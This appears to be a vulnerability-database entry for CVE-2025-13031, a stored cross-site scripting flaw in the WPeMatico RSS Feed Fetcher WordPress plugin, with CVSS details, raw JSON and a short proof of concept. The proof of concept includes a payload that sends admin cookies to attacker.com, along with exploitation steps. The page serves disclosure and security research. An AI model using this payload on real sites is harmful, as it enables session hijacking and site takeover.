Security Vulnerability Report
CVE-2025-13031 CVSS 5.9 MEDIUM

Published: 2025-12-09 16:17:35
Last Modified: 2026-04-15 00:35:42

Description

The WPeMatico RSS Feed Fetcher WordPress plugin before 2.8.13 does not sanitize and escape some of its settings, which could allow high privilege users such as contributor to perform Stored Cross-Site Scripting attacks

CVSS Details

CVSS Score
5.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

WPeMatico RSS Feed Fetcher < 2.8.13

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2025-13031 WPeMatico Stored XSS PoC
// This PoC demonstrates the stored XSS vulnerability in WPeMatico plugin < 2.8.13
// Requires contributor+ privileges
// Attacker injects the following payload in plugin settings fields:
// <script>alert(document.cookie)</script>
// or more sophisticated payload for session hijacking:
var poc_payload = `
<img src=x onerror="
fetch('https://attacker.com/steal?c='+btoa(document.cookie))
">
`;
// The payload is stored in database without sanitization
// When admin visits the affected page, the script executes
// Example exploitation steps:
// 1. Login as contributor user
// 2. Navigate to WPeMatico settings
// 3. Inject XSS payload in settings fields (e.g., campaign title, feed URL)
// 4. Save the settings - payload gets stored
// 5. Wait for admin to view the settings page
// 6. Attacker receives admin cookies via webhook

References

https://wpscan.com/vulnerability/9bf76fed-8f0a-4aef-8cf4-f6839c8f0a53/

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-13031",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-09T16:17:34.980",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The WPeMatico RSS Feed Fetcher WordPress plugin before 2.8.13 does not sanitize and escape some of its settings, which could allow high privilege users such as contributor to perform Stored Cross-Site Scripting attacks"
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L",
            "baseScore": 5.9,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 1.7,
          "impactScore": 3.7
        }
      ]
    },
    "references": [
      {
        "url": "https://wpscan.com/vulnerability/9bf76fed-8f0a-4aef-8cf4-f6839c8f0a53/",
        "source": "[email protected]"
      },
      {
        "url": "https://wpscan.com/vulnerability/9bf76fed-8f0a-4aef-8cf4-f6839c8f0a53/",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"
      }
    ]
  }
}